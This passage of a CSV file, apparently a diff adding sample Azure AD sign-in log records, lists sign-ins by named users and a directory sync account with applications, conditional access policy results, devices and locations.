'69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7884ba69-dd12-4f6d-9a79-181d5f890300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7884ba69-dd12-4f6d-9a79-181d5f890300,SigninLogs,Sucess,33.0175209,35.44601059
+886,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-05931fc00300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,80d584c4-dd35-4dcb-882c-05931fc00300,SigninLogs,Sucess,33.0175209,35.44601059
+887,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9de52e56-e2df-4c5d-80b7-4ddaa05d4b35,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8361f2d3-1959-4242-988e-de2deb990400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,8361f2d3-1959-4242-988e-de2deb990400,SigninLogs,Sucess,41.90428925,-85.99833679
+888,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c88d61e-9e87-4216-a0ca-593fd0104f64,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",724252ea-eeaa-47d5-808a-7afee81d0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,724252ea-eeaa-47d5-808a-7afee81d0500,SigninLogs,Sucess,36.6404686,-78.26995087
+889,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:09.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-05931fc00300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,80d584c4-dd35-4dcb-882c-05931fc00300,SigninLogs,Sucess,33.0175209,35.44601059
+890,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9de52e56-e2df-4c5d-80b7-4ddaa05d4b35,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8361f2d3-1959-4242-988e-de2deb990400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,8361f2d3-1959-4242-988e-de2deb990400,SigninLogs,Sucess,41.90428925,-85.99833679
+891,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37aa5f26-577b-4295-92f2-1eaa15737e79,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",706e1892-a48a-4a34-be7e-877757fa1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,706e1892-a48a-4a34-be7e-877757fa1900,SigninLogs,Sucess,36.6404686,-78.26995087
+892,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:09.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",46ab66bf-13d5-46c8-a514-03b7e6220400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,46ab66bf-13d5-46c8-a514-03b7e6220400,SigninLogs,Sucess,33.0175209,35.44601059
+893,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9821b032-3263-4164-b27f-a1aafa2ba041,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 